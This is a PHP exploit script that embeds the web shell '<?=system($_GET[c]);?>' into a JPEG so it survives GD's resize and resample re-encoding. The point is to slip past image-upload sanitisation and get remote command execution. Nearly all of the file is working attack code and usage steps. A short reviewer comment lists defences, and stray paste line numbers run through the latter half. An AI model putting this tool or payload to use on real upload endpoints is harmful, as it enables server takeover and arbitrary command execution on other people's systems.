<?php
    /*

    The algorithm injects the payload into a JPG image so that it remains unchanged after the
    transformations caused by the PHP functions imagecopyresized() and imagecopyresampled().
    It is necessary that the size and quality of the initial image are the same as those of the processed
    image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:
    php jpg_payload.php <jpg_name.jpg>

    In case of successful injection you will get a specially crafted image, which should be uploaded again.

    Since the most straightforward injection method is used, the following problems can occur:
    1) After the second processing the injected data may become partially corrupted.
    2) The jpg_payload.php script outputs "Something's wrong".
    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another
    initial image.

    Sergey Bobrov @Black2Fan.

    See also:
    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

    Reviewer note (defender's view): what this script demonstrates is that round-tripping an upload
    through GD is not a sanitisation step - bytes placed in front of the scan data can survive the
    re-encode. Controls that do not depend on image content are the ones that hold: store uploads
    outside the document root or serve them through a handler that never executes scripts, choose the
    stored file name and extension server-side (never from the client), and send an explicit
    Content-Type plus X-Content-Type-Options: nosniff when serving them back.

    */

    // The bytes to embed in front of the scan data; see the header for when changing them is needed.
    $miniPayload = '<?=system($_GET[c]);?>';

    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    // GD reports decode problems as PHP warnings, not exceptions; custom_error_handler() (defined
    // below) folds them into the $correctImage / $extraBytes globals that the loop reads.
    set_error_handler("custom_error_handler");

    // Retry with a growing run of NUL padding (0..1023 bytes) placed after the payload.
    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        // Both globals are (re)set by custom_error_handler() during the trial decodes below.
        $extraBytes = 0;
        $correctImage = TRUE;

        // Every JPEG begins with the SOI marker 0xFFD8.
        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        // Walk the marker segments: 0xFF, marker byte, then a 2-byte length that includes itself.
        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            // SOS (start of scan): the entropy-coded data starts right after this segment.
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp =
                    substr($outStream, 0, $startPos) .
                    $miniPayload .
                    str_repeat("\0",$nullbytePayloadSize) .
                    substr($outStream, $startPos);
                // Trial decode of the candidate in a scratch file (removed afterwards); its only
                // purpose is to populate $correctImage / $extraBytes via the error handler.
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    // GD skipped $extraBytes before the next marker: drop that many bytes from the
                    // end of the padded scan data so the stream length stays consistent.
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream =
                        substr($outStream, 0, $startPos) .
                        $miniPayload .
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    // Decoded without any warning: keep the candidate as-is.
                    $outStream = $outStreamTmp;
                } else {
                    // Decode failed for some other reason: try the next padding length.
                    break;
                }
                // Write the real output file and confirm it decodes cleanly.
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    // Every padding length was tried without a clean decode.
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');
  97.  
    /**
     * Writes $data to $filename and asks GD to decode it.
     *
     * The verdict is not taken from imagecreatefromjpeg()'s return value: $correctImage is reset to
     * TRUE here and cleared by custom_error_handler() if GD raises any warning during the decode, so
     * the error handler must already be installed (set_error_handler() at the top of the script) and
     * the statement order in this function is load-bearing.
     *
     * @param string $filename path to write and then decode
     * @param string $data     file contents
     * @param bool   $unlink   remove the file again once the decode attempt is done
     * @return bool TRUE when GD decoded the file without raising a warning
     */
    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }
  107.  
  108.     function custom_error_handler($errno, $errstr, $errfile, $errline) {
  109.         global $extraBytes, $correctImage;
  110.         $correctImage = FALSE;
  111.         if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
  112.             if(isset($m[1])) {
  113.                 $extraBytes = (int)$m[1];
  114.             }
  115.         }
  116.     }
  117.  
  118.     class DataInputStream {
  119.         private $binData;
  120.         private $order;
  121.         private $size;
  122.  
  123.         public function __construct($filename, $order = false, $fromString = false) {
  124.             $this->binData = '';
  125.             $this->order = $order;
  126.             if(!$fromString) {
  127.                 if(!file_exists($filename) || !is_file($filename))
  128.                     die('File not exists ['.$filename.']');
  129.                 $this->binData = file_get_contents($filename);
  130.             } else {
  131.                 $this->binData = $filename;
  132.             }
  133.             $this->size = strlen($this->binData);
  134.         }
  135.  
  136.         public function seek() {
  137.             return ($this->size - strlen($this->binData));
  138.         }
  139.  
  140.         public function skip($skip) {
  141.             $this->binData = substr($this->binData, $skip);
  142.         }
  143.  
  144.         public function readByte() {
  145.             if($this->eof()) {
  146.                 die('End Of File');
  147.             }
  148.             $byte = substr($this->binData, 0, 1);
  149.             $this->binData = substr($this->binData, 1);
  150.             return ord($byte);
  151.         }
  152.  
  153.         public function readShort() {
  154.             if(strlen($this->binData) < 2) {
  155.                 die('End Of File');
  156.             }
  157.             $short = substr($this->binData, 0, 2);
  158.             $this->binData = substr($this->binData, 2);
  159.             if($this->order) {
  160.                 $short = (ord($short[1]) << 8) + ord($short[0]);
  161.             } else {
  162.                 $short = (ord($short[0]) << 8) + ord($short[1]);
  163.             }
  164.             return $short;
  165.         }
  166.  
  167.         public function eof() {
  168.             return !$this->binData||(strlen($this->binData) === 0);
  169.         }
  170.     }
  171. ?>